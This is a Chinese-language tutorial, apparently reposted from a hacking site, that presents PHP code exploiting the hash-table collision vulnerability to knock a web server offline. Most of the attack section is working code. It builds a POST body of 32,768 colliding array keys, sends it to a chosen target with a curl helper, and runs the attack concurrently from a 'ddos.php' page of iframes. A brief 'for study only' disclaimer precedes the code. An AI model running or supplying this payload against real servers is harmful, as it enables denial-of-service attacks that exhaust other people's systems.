2015-03-26 11:26:37 www.hackbase.com 来源:互联网
本文实例分析了PHP利用hash冲突漏洞进行DDoS攻击的方法。分享给大家供大家参考。具体分析如下: 首先声明:本文内容只用于研究学习使用,请勿用于非法行为! 前面提到过最近爆出的hash表碰撞漏洞,包括java、 ...
本文实例分析了PHP利用hash冲突漏洞进行DDoS攻击的方法。分享给大家供大家参考。具体分析如下:
首先声明:本文内容只用于研究学习使用,请勿用于非法行为!
前面提到过最近爆出的hash表碰撞漏洞,包括java、python、php等在内的很多常用语言均未幸免,今晚咱就来实际看看它的威力。
通过向目标服务器post一组精心拼凑的数组参数,到达服务端后语言底层处理接收到的数组参数时,由于该漏洞的存在造成CPU的大量消耗,最终导致服务器资源耗尽。不用什么花哨的手法,就用PHP简单实现下看下效果,点到即止。
// 目标地址
// 只要目标地址存在,不用管它是干嘛的
$data
=
''
;
$size
= pow(2, 15);
for
(
$key
=0,
$max
=(
$size
-1)*
$size
;
$key
<=
$max
;
$key
+=
$size
)
{
$data
.=
'&array['
.
$key
.
']=0'
;
}
$ret
= curl(
$host
, ltrim(
$data
,
'&'
));
var_dump(
$ret
);
function
curl(
$url
,
$post
,
$timeout
= 30){
$ch
= curl_init();
curl_setopt(
$ch
, CURLOPT_RETURNTRANSFER, true);
curl_setopt(
$ch
, CURLOPT_TIMEOUT,
$timeout
);
curl_setopt(
$ch
, CURLOPT_CONNECTTIMEOUT,
$timeout
- 5);
curl_setopt(
$ch
, CURLOPT_HTTPHEADER,
array
(
'Expect:'
));
curl_setopt(
$ch
, CURLOPT_URL,
$url
);
curl_setopt(
$ch
, CURLOPT_POST, true);
curl_setopt(
$ch
, CURLOPT_POSTFIELDS,
$post
);
$output
= curl_exec(
$ch
);
if
(
$output
=== false)
return
false;
$info
= curl_getinfo(
$ch
);
$http_code
=
$info
[
'http_code'
];
if
(
$http_code
== 404)
return
false;
curl_close(
$ch
);
return
$output
;
}
文件:ddos.php
<!DOCTYPE html PUBLIC
"-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
>
<head>
<meta http-equiv=
"Content-Type"
content=
"text/html; charset=gb2312"
/>
<title>DDOS</title>
</head>
<body>
<?php
for
(
$i
=0;
$i
<5;
$i
++){
//并发数
echo
'<iframe src="dos.php?a='
.
$i
.
'" scrolling="false" frameborder="1" allowtransparency="true" style="background-color:transparent;"></iframe>'
;
}
?>
</body>
</html>
希望本文所述对大家的php程序设计有所帮助。
免责声明:本文仅代表作者个人观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
本文引用网址: